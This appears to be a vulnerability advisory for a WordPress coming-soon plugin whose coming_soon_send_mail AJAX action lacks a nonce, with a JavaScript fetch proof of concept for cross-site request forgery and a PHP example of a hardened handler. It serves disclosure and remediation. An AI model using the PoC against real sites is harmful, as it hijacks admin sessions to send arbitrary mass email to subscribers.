The plugin does not perform a CSRF check (WordPress nonce) in its coming_soon_send_mail AJAX action, served through wp-admin/admin-ajax.php. An attacker who can get a logged-in admin to load a page they control can therefore make the admin's browser submit the action and send an arbitrary email to every subscribed user. The cross-site response is not readable by the attacker page because of CORS, but the request has already been processed by admin-ajax.php by then. Whether the victim's browser attaches the WordPress authentication cookies to this cross-site POST depends on its SameSite defaults (Chromium treats cookies set without a SameSite attribute as Lax, which excludes cross-site fetch POSTs); the missing nonce is the server-side defect regardless of that.
// PoC: host this on any attacker-controlled page and have a logged-in admin load it.
// A form-urlencoded POST is a CORS "simple request": no preflight is sent, so the browser
// issues it before any CORS check and the server executes the action; only the
// response is withheld from the attacker page.
// massage_* are the plugin's own parameter names as given in the original PoC.
// The final parameter was obfuscated by email protection in the source and its name
// was lost; it is left as it appeared.
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=coming_soon_send_mail&massage_title=title&massage_description=description&massage_from_name=from&[email protected]",
  "method": "POST",
  "credentials": "include"   // attach the victim's WordPress session cookies
}).then(response => response.text())
  .then(data => console.log(data))
  .catch(err => console.log("response not readable cross-origin:", err.message));
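The missing check is a WordPress nonce tied to the logged-in user, which a cross-site page cannot read. The following is an added example, not the plugin's own code: it shows an admin-ajax handler in the vulnerable shape described above beside a hardened one. The hook name coming_soon_send_mail and the massage_* POST fields come from the advisory; the function names, the nonce action string cs_send_mail, the POST field name nonce, the option name cs_subscribers, the script handle cs-admin and the get_subscriber_emails() helper are assumptions made for the example.

```php
<?php
// Added example of a "send mail to subscribers" AJAX handler for WordPress.
// Not the plugin's code: only the hook name and the massage_* fields are taken
// from the advisory; every other name here is assumed.

// BEFORE: the shape the advisory describes. Being logged in is the only
// requirement, so any cross-site page an admin visits can trigger the mailing.
function cs_send_mail_vulnerable() {
    $title = sanitize_text_field( wp_unslash( $_POST['massage_title'] ?? '' ) );
    $body  = wp_kses_post( wp_unslash( $_POST['massage_description'] ?? '' ) );
    foreach ( get_subscriber_emails() as $to ) {
        wp_mail( $to, $title, $body );
    }
    wp_send_json_success();
}
// add_action( 'wp_ajax_coming_soon_send_mail', 'cs_send_mail_vulnerable' );

// AFTER: two independent checks before any mail is sent.
//  1. check_ajax_referer() validates a nonce for action 'cs_send_mail' carried in
//     the 'nonce' POST field. A forged cross-site request cannot supply it.
//  2. current_user_can() enforces the capability, so a low-privilege user who can
//     still reach admin-ajax.php cannot trigger the mailing either.
function cs_send_mail_hardened() {
    // Third argument false: return instead of die(), so a JSON error can be sent.
    if ( ! check_ajax_referer( 'cs_send_mail', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    $title     = sanitize_text_field( wp_unslash( $_POST['massage_title'] ?? '' ) );
    $body      = wp_kses_post( wp_unslash( $_POST['massage_description'] ?? '' ) );
    $from_name = sanitize_text_field( wp_unslash( $_POST['massage_from_name'] ?? '' ) );
    if ( '' === $title || '' === $body ) {
        wp_send_json_error( array( 'message' => 'Title and description are required.' ), 400 );
    }

    // The sender address is pinned to the site's admin email rather than taken
    // from the request (assumed policy), so the handler cannot be used to spoof From:.
    $headers = array( 'From: ' . $from_name . ' <' . get_option( 'admin_email' ) . '>' );
    $sent    = 0;
    foreach ( get_subscriber_emails() as $to ) {
        if ( wp_mail( $to, $title, $body, $headers ) ) {
            $sent++;
        }
    }
    wp_send_json_success( array( 'sent' => $sent ) );
}
add_action( 'wp_ajax_coming_soon_send_mail', 'cs_send_mail_hardened' );

// Hand the nonce to the legitimate admin page so its own JavaScript can include
// it as the 'nonce' POST field (script handle and JS object name are assumed).
function cs_enqueue_admin_script( $hook_suffix ) {
    wp_enqueue_script( 'cs-admin', plugins_url( 'admin.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'cs-admin', 'csAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'cs_send_mail' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'cs_enqueue_admin_script' );

// Assumed helper: the subscriber list is stored as an array in a site option.
function get_subscriber_emails() {
    $list = get_option( 'cs_subscribers', array() );
    return array_filter( array_map( 'sanitize_email', (array) $list ) );
}
```

With the hardened handler in place, the PoC above is answered with a 403 and no mail is sent: the forged POST carries the victim's cookies but not the per-user nonce, which WordPress derives from the session token and rotates every 12 to 24 hours. The capability check is worth keeping even though the advisory only mentions admins, because admin-ajax.php is reachable by any authenticated role.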